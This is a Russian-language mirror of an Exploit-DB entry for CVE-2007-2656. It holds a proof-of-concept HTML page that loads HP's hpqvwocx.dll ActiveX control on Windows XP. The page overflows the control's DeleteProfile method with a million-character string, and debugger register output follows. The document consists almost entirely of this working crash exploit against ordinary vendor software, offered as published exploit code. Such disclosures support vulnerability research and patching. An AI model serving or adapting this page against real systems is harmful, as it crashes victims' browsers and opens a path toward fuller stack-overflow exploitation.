- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3898
- Проверка EDB
-
- Пройдено
- Автор
- CALLAX
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2007-2656
- Дата публикации
- 2007-05-11
HTML:
<html>
<head>
<title>
Proof of Concept -> Hewlett Packard Stack Overflow in hpqvwocx.dll v1.0.0.309
</title>
</head>
<h4>Proof of Concept -> Hewlett Packard Stack Overflow in hpqvwocx.dll v1.0.0.309<br>
Tested in Windows XP Service Pack 2<br>
Discovered by Goodfellas Security Research Team<br>
Url ->http://www.hp.com<br> author -> callAX<br>mail -> [email protected]<br>
http://www.shellcode.com.ar / http://www.securenetworks.ch</h4>
<object classid='clsid:BA726BF9-ED2F-461B-9447-CD5C7D66CE8D' id='pAF' ></object>
<input type="button" value="Boom" language="VBScript" OnClick="OuCh()">
<script language="VBScript">
sub OuCh()
Var_0 = String(1000000, "A")
pAF.DeleteProfile Var_0
End Sub
</script>
</html>
<!--
Tested in OllyDBG 1.08b
TEST DWORD PTR DS:[ECX],EAX
EAX -> 000ED484
ECX -> 000425F4
EDX -> 00000000
EBX -> 00000000
EIP -> 04B47B97
Sub DeleteProfile (
ByVal Name As String
)
-->
# milw0rm.com [2007-05-11]- Источник
- www.exploit-db.com
